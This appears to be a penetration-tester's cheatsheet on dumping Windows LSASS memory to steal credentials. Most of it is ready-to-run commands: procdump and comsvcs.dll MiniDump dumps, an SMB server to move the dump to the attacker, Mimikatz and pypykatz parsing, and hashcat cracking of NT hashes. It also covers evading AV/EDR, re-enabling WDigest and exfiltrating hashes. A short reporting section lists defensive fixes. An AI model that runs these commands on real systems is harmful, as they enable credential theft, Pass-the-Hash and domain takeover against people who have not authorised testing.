π‘οΈ Methodology Checklist
- Confirm SYSTEM privileges before dumping
- Method 1 β procdump:
procdump.exe -accepteula -ma lsass.exe lsass.dmp - Method 2 β comsvcs.dll:
rundll32 C:\Windows\System32\comsvcs.dll MiniDump [LSASS_PID] lsass.dmp full - Method 3 β Task Manager: right-click lsass β Create dump file
- Transfer dump to attacker:
impacket-smbserver share . -smb2support - Parse with Mimikatz:
sekurlsa::minidump lsass.dmp; sekurlsa::logonpasswords - Extract hashes for PtH or offline cracking
π― Operational Context
Use when: SYSTEM or Admin access on Windows target β dump LSASS memory for NTLM hashes, Kerberos tickets, and potentially plaintext creds.
Think Dumber First: rundll32 C:\windows\system32\comsvcs.dll, MiniDump [LSASS_PID] C:\Temp\lsass.dmp full β built-in Windows method, no external tool needed. Get LSASS PID with tasklist | findstr lsass. Then parse dump offline with mimikatz sekurlsa::minidump.
Skip when: Credential Guard enabled β LSASS memory wonβt contain usable credential material.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
tasklist /svc | Find lsass.exe PID (CMD) |
Get-Process lsass | Find lsass.exe PID (PowerShell) |
rundll32 C:\windows\system32\comsvcs.dll, MiniDump [PID] C:\lsass.dmp full | Dump LSASS memory to disk (requires elevated session) |
pypykatz lsa minidump /path/to/lsass.dmp | Parse LSASS dump for credentials |
sudo hashcat -m 1000 [NT_HASH] rockyou.txt | Crack extracted NT hash |
π¬ Deep Dive & Workflow
Why LSASS Is High Value
LSASS caches credentials in memory for every active logon session on the machine. Dumping it yields:
- NT hashes for every logged-in user
- Clear-text passwords on older systems (Windows XPβ8 / Server 2003β2012) or if WDIGEST is re-enabled
- Kerberos tickets (usable for Pass-the-Ticket)
- DPAPI master keys for decrypting Chrome/Outlook/RDP credentials
Dump Method 1 β Task Manager (GUI)
Requires an interactive graphical session:
- Open Task Manager β Processes tab
- Right-click
Local Security Authority ProcessβCreate dump file - File saved to
%temp%\lsass.DMP
Dump Method 2 β comsvcs.dll (CLI, Shell-Friendly)
# Step 1: Get PID
tasklist /svc
# or
Get-Process lsass
# Step 2: Dump (elevated session required)
rundll32 C:\windows\system32\comsvcs.dll, MiniDump [PID] C:\lsass.dmp fullNote: This method is commonly flagged by AV/EDR. The comsvcs.dll approach is a Living-off-the-Land technique but well-known to defenders.
Parsing with Pypykatz
Transfer the .dmp file to the attack host, then parse:
pypykatz lsa minidump lsass.dmpOutput sections and what to extract:
| Section | Contents | Action |
|---|---|---|
== MSV == | SID, NT hash, SHA1 hash | Crack with Hashcat mode 1000, or use directly for PtH |
== WDIGEST == | Clear-text password (if enabled) | Use directly |
== Kerberos == | Domain tickets, ekeys, pins | Use for Pass-the-Ticket |
== DPAPI == | Master keys | Decrypt Chrome/Outlook/RDP stored credentials |
WDIGEST Context
WDIGEST stores clear-text credentials in memory for legacy digest authentication. Disabled by default since Windows 8.1/2012 R2 via the UseLogonCredential registry key. Attackers can re-enable it on a compromised host to capture the next logon.
Cracking When WDIGEST Is Disabled
Extract the NT hash from the MSV section of pypykatz output and crack offline:
sudo hashcat -m 1000 [NT_HASH] /usr/share/wordlists/rockyou.txtAlternatively, use the NT hash directly for Pass-the-Hash without cracking.
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| LSASS dump blocked by AV/EDR | PPL or EDR protection | Try: ProcDump, Task Manager full dump, or use custom LSASS dumper with syscall-based access |
| MiniDump fails with Access Denied | Not SYSTEM (admin not enough) | Elevate to SYSTEM first: PsExec64.exe -i -s cmd.exe or token impersonation |
| Mimikatz fails to parse dump | Dump incomplete or corrupted | Verify dump size; re-dump; use pypykatz on Linux as alternative parser |
| sekurlsa::logonpasswords shows only NTLM no plaintext | WDigest disabled | Expected post-2013; focus on NTLM hashes for PtH; look for kerberos tickets |
| Dump file too large to transfer | LSASS taking 500MB+ | Compress: Compress-Archive lsass.dmp lsass.zip; or parse on target and exfil only hashes |
π Reporting Trigger
Finding Title: LSASS Memory Dump Yields NTLM Hashes and Kerberos Tickets Impact: LSASS memory dump provides NTLM hashes for all interactively logged-on accounts including any Domain Admins, enabling Pass-the-Hash attacks and complete domain compromise without additional exploitation. Root Cause: LSASS not protected by PPL or Credential Guard. SYSTEM access achieved without detection of the dump activity. Recommendation: Enable Credential Guard on all Windows 10+ endpoints. Enable LSA protection (PPL) via registry. Deploy EDR with LSASS access monitoring. Alert on processes opening LSASS with PROCESS_VM_READ permissions.